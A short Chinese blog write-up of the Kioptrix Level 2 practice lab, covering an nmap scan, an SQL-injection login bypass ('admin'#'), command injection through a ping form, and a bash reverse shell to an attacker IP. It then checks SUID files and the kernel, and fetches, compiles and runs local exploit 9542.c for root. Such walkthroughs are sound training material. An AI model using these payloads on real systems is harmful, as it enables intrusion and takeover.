Kioptrix Level2靶机

0x01信息收集

nmap -sV -O 10.121.65.83

0x02 万能密码&&命令执行

访问80端口(经测试 443端口并没有办法访问)

登录框尝试弱口令和sql注入 发现存在万能密码

admin'#

存在一个ping命令,尝试通过管道符看是否会执行命令

127.0.0.0|id

存在命令执行漏洞,那么反弹一个shell即可

127.0.0.1|bash -i >& /dev/tcp/10.121.65.78/4444 0>&1

0x03 权限提升

通过suid尝试提权

find / -perm -u=s -type f 2>/dev/null 查找有权限的文件

发现并没有可以利用的地方

接着查看操作系统版本号

查看linux系统版本信息命令:lsb_release -a

查看内核版本 uname -a

发现是CenOS 4.5 内核为 linux 2.6.9

攻击机上开启web服务

python2 -m SimpleHTTPServer 80

然后在靶机上通过wget下载9542.c,在靶机上进行编译(因为这个脚本只支持x86,在64上无法编译。)

cd /tmp

wget 10.121.65.78/9542.c

这里要到tmp目录下才能下载,否则其他目录都没办法写入

gcc 9542.c -o 9542

./9542

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

匿名用户0x3c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值